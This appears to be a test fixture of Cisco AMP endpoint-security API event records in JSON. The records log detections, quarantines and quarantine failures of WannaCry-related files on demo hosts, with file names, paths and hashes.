+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6264772012435046000,"timestamp":1610631959,"timestamp_nanoseconds":940000000,"date":"2021-01-14T13:45:59+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.D5221F6847-100.SBX.TG","detection_id":"6264772012435046402","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"Unconfirmed 762952.crdownload","file_path":"\\\\?\\C:\\Users\\rsteadman\\Downloads\\Unconfirmed 762952.crdownload","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":724000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":366000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741862","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":225000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741859","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":210000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741858","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":194000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741855","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"},"parent":{"process_id":708,"disposition":"Clean","file_name":"lsass.exe","identity":{"sha256":"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71","sha1":"7abcc82dc5a05b4f53fd0fbd386738e5555025cf","md5":"4e568dbe3fff1a0025eb432dc929b78f"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":178000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419214500913741857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"\\\\?\\C:\\Windows\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":163000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.24D004A104-100.SBX.TG","detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mssecsvc.exe","file_path":"C:\\WINDOWS\\mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214500913742000,"timestamp":1610631812,"timestamp_nanoseconds":709000000,"date":"2021-01-14T13:43:32+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214500913741856","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214492323807000,"timestamp":1610631810,"timestamp_nanoseconds":447000000,"date":"2021-01-14T13:43:30+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419214488028840000,"timestamp":1610631809,"timestamp_nanoseconds":916000000,"date":"2021-01-14T13:43:29+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419214488028839966","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\Windows\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":5580,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14945890085425,"timestamp":1610630976,"timestamp_nanoseconds":535214029,"date":"2021-01-14T13:29:36+00:00","event_type":"Potential Dropper Infection","event_type_id":1107296257,"detection":"W32.Variant:Gen.20gl.1201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610630976,"start_date":"2021-01-14T13:29:36+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412574627503014000,"timestamp":1610630889,"timestamp_nanoseconds":341000000,"date":"2021-01-14T13:28:09+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":50000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":596000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":34000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":894000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":4688,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":286000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
